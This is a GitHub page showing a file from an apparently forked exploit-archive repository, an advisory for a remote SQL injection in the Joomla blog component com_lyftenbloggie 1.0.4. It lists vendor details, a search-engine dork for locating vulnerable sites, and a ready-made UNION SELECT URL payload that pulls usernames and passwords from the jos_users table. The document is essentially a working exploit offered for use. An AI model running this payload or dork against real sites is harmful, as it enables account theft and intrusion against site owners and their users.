forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10039.txt
26 lines (16 loc) · 1.12 KB
/
10039.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
Joomla Component com_lyftenbloggie 1.04 Remote SQL Injection Vulnerability
==========================================================================
[ Software Information ]
[+] Vendor : http://www.lyften.com/
[+] Download : http://www.lyften.com/products/lyftenbloggie/download/id-10.html
[+] Description : LyftenBloggie is a blog publishing component for Joomla 1.5. LyftenBloggie is both free and opensource.
[+] version : 1.0.4 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_lyftenbloggie" / "Powered by LyftenBloggie"
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################
[ Vulnerable File ]
http://server/index.php?option=com_lyftenbloggie&author=[ValidID][INDONESIANCODER]
[ Exploit ]
http://server/index.php?option=com_lyftenbloggie&author=62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_users--
#############################################################################################